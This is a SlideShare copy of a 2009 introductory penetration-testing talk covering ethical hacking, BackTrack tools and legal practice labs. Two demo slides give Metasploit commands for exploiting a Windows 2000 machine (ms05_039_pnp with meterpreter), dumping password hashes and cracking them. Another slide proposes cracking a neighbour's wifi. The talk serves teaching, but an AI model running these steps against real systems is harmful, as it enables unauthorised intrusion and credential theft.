Hack Attack!
An Introduction to Penetration Testing




    Steve Phillips (aka fraktil)
     2009.12.17 @ SBLUG
Who Am I?
●   Attended UCSB 2004-2008
    –   Majored in Math and Philosophy, not CS
●   Started using Linux in 2001
    –...
Can Hacking Be Ethical?
                Or, what is Ethical Hacking?

●   Black Hat
    –   Compromises computer systems w...
The Stages of Hackerdom
●   Script Kiddie (“skiddie”)
    –   Can only run automated tools
    –   Doesn't understand unde...
Programming Languages Used to
     Create Hacking Tools
●   C
    –   Nmap (network mapper, portscanner, more)
    –   Nes...
What About in Back|Track 4?
                    Overall: Tools + Exploits
●   File count: find /pentest | grep .c$ | wc -l...
What About in Back|Track 4?
                Exploits Only (from exploitdb)

●   C
    –   1321 .c files
●   Python
    –  ...
TIOBE Index
Programming Language Popularity
Back|Track 4 Categories
●   Information Gathering
    –   Email addresses, DNS
●   Network Mapping
●   Vulnerability Ident...
Back|Track 4 Categories
●   Privilege Escalation
●   Maintaining Access
●   Digital Forensics
●   Reverse Engineering
●   ...
DEMO: Sniffing Passwords
             with Ettercap
●   ARP Poisoning for MitM Attack
    –   Associate attacker's MAC wit...
How Else Can We Get Creds?
●   Phishing
    –   Via email
●   Spear Phishing
    –   Becoming popular
    –   Very hard to...
DEMO: Bruteforcing FTP
●   Using Hydra to bruteforce weak FTP password
    –   Well, really a dictionary attack
DEMO: Pwning Win2k
●   Create database (or connect to existing)
    –   db_create [optional_database_name]
●   Find win2k ...
DEMO: Pwning Win2k
●   Set parameters
    –   set RHOST [target_ip]
●   Now we exploit! Can you guess the command?
    –  ...
Why Become an Ethical Hacker?
●   Field is growing (see next slide)
    –   New laws, regulations
    –   US government fa...
How Can I Practice Legally?
●   Virtualization (VMware, VirtualBox)
    –   Use virtual images from recent CTF competition...
Further Resources
                           Learning

●   Metasploit
    –   Online Class: http://www.offensive-
        ...
Tools Added to Back|Track
                  Extra Tools I Used

●   Metasploit 3.3.2 (updated)
●   Nmap 5.0 (updated)

●  ...
Summary
●   Hacking can be ethical
●   “Computer security” is an oxymoron
    –   No one is safe
●   REALLY powerful hacki...
Future Demos?
●   More local fun
    –   Crack neighbor's wifi (WEP)
    –   Exploit remote vuln in DD-WRT firmware
    – ...
Contact Information
●   Name:       Steve Phillips
●   New Blog:   SweetHack.blogspot.com
●   Email:      fraktil@gmail.co...
Questions?
Hack Attack! An Introduction to Penetration Testing
Upcoming SlideShare
Loading in …5
×

Hack Attack! An Introduction to Penetration Testing

8,410 views

Published on

Published in: Technology
0 Comments
7 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
8,410
On SlideShare
0
From Embeds
0
Number of Embeds
216
Actions
Shares
0
Downloads
362
Comments
0
Likes
7
Embeds 0
No embeds

No notes for slide

Hack Attack! An Introduction to Penetration Testing

  1. 1. Hack Attack! An Introduction to Penetration Testing Steve Phillips (aka fraktil) 2009.12.17 @ SBLUG
  2. 2. Who Am I? ● Attended UCSB 2004-2008 – Majored in Math and Philosophy, not CS ● Started using Linux in 2001 – Mandrake, then Slackware, then Debian ● Applying for penetration testing job in January ● Biases/“Preferences” – Linux > Windoze (duh) – Python > Ruby – Emacs > vi – Debian (and variants) > others
  3. 3. Can Hacking Be Ethical? Or, what is Ethical Hacking? ● Black Hat – Compromises computer systems without permission – Criminal ● White Hat, aka Ethical Hacker – Gets paid to hack – legally (friggin' sweet) – Always gets permission before attacking a system ● Gray Hat – Some combination of Black and White
  4. 4. The Stages of Hackerdom ● Script Kiddie (“skiddie”) – Can only run automated tools – Doesn't understand underlying technology ● Advanced Beginner – Mastered advanced features of many tools – Knows enough programming to create own tools ● C => Python, Ruby (see next slide) ● Uberhacker – Discovers new vulnerabilities (or new types of vulns) – Knows Assembly, C, Python and/or Ruby, SQL – Excellent programmer; writes tools, scripts regularly – Can defend as well as attack (firewalls, IDS, etc)
  5. 5. Programming Languages Used to Create Hacking Tools ● C – Nmap (network mapper, portscanner, more) – Nessus (vulnerability detection) – Wireshark (network sniffer) ● Python – w3af (web app attack framework) – sqlmap (automatic SQL injection) – TheMiddler (session hijacking, targeted pw sniffing) ● Ruby – Metasploit (vuln exploitation, much more)
  6. 6. What About in Back|Track 4? Overall: Tools + Exploits ● File count: find /pentest | grep .c$ | wc -l ● Line count: cat $(find /pentest | grep .c$) | wc -l ● C: 4058 .c files 1,300,000 lines ● Python: 2431 .py files 612,000 lines ● Ruby: 5468 .rb files 694,000 lines ● 2773 files from Metasploit ● 1271 files from Dradis (information organizing, sharing) ● 1424 other ● C++: 431 .cpp files 144,000 lines
  7. 7. What About in Back|Track 4? Exploits Only (from exploitdb) ● C – 1321 .c files ● Python – 405 .py files ● Ruby – 146 .rb files ● C++ – 110 .cpp files
  8. 8. TIOBE Index Programming Language Popularity
  9. 9. Back|Track 4 Categories ● Information Gathering – Email addresses, DNS ● Network Mapping ● Vulnerability Identification ● Web Application Analysis ● Radio Network Analysis ● Penetration (not that kind)
  10. 10. Back|Track 4 Categories ● Privilege Escalation ● Maintaining Access ● Digital Forensics ● Reverse Engineering ● VoIP (Voice over Internet Protocol) ● Misc
  11. 11. DEMO: Sniffing Passwords with Ettercap ● ARP Poisoning for MitM Attack – Associate attacker's MAC with router's IP – Target tries to route traffic through router ● Routes it through attacker instead – Attacker forwards traffic both ways – Attacker can silently watch or inject traffic ● TheMiddler, sslstrip
  12. 12. How Else Can We Get Creds? ● Phishing – Via email ● Spear Phishing – Becoming popular – Very hard to stop ● In-person Social Engineering – Kevin Mitnick is famous for this ● Brute force
  13. 13. DEMO: Bruteforcing FTP ● Using Hydra to bruteforce weak FTP password – Well, really a dictionary attack
  14. 14. DEMO: Pwning Win2k ● Create database (or connect to existing) – db_create [optional_database_name] ● Find win2k box using nmap (in metasploit) – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24 ● Search Metasploit for win2k exploits – search 2000 ● Use exploit w/meterpreter – use exploit/windows/smb/ms05_039_pnp – set PAYLOAD windows/meterpreter/bind_tcp ● Which parameters still need to be set? – show options
  15. 15. DEMO: Pwning Win2k ● Set parameters – set RHOST [target_ip] ● Now we exploit! Can you guess the command? – exploit ● Get hashes – hashdump – This would be much harder without meterpreter! ● Copy and paste hashes into new text file ● Crack hashes with john the ripper – ./john [file_containing_hashes].txt ● Game Over
  16. 16. Why Become an Ethical Hacker? ● Field is growing (see next slide) – New laws, regulations – US government falling behind in cyber security ● You get paid to hack – need I say more? – Banks – Telecoms – Casinos – Foreign countries (for the federal gov't)
  17. 17. How Can I Practice Legally? ● Virtualization (VMware, VirtualBox) – Use virtual images from recent CTF competitions ● http://lampsecurity.org/capture-the-flag-6 ● http://ctf.hcesperer.org/25c3ctf ● http://ctf.hcesperer.org/daopen08 ● http://ctf.hcesperer.org/eh08ctf ● NetWars – Part of government's Cyber Defense Initiative 2009 ● DVL: Damn Vulnerable Linux – Purposely misconfigured, exploitable – http://tinyurl.com/dvllinux15
  18. 18. Further Resources Learning ● Metasploit – Online Class: http://www.offensive- security.com/metasploit-unleashed/ ● Nmap Guide – http://nmap.org/book/man.html ● Security Videos, Tutorials – http://securitytube.net
  19. 19. Tools Added to Back|Track Extra Tools I Used ● Metasploit 3.3.2 (updated) ● Nmap 5.0 (updated) ● Exploitdb archive (/pentest/exploits/exlpoitdb)
  20. 20. Summary ● Hacking can be ethical ● “Computer security” is an oxymoron – No one is safe ● REALLY powerful hacking tools exist ● Metasploit is effing dangerous
  21. 21. Future Demos? ● More local fun – Crack neighbor's wifi (WEP) – Exploit remote vuln in DD-WRT firmware – Redirecting traffic using fake DNS server – Intercepting Twitter, Facebook, LinkedIn creds ● More like real pen testing – SQL injection – XSS – Nessus scan
  22. 22. Contact Information ● Name: Steve Phillips ● New Blog: SweetHack.blogspot.com ● Email: fraktil@gmail.com ● Twitter: twitter.com/fraktil ● LinkedIn: linkedin.com/in/sdphillips ● IRC: fraktil in #sblug on borg-cube.com
  23. 23. Questions?

×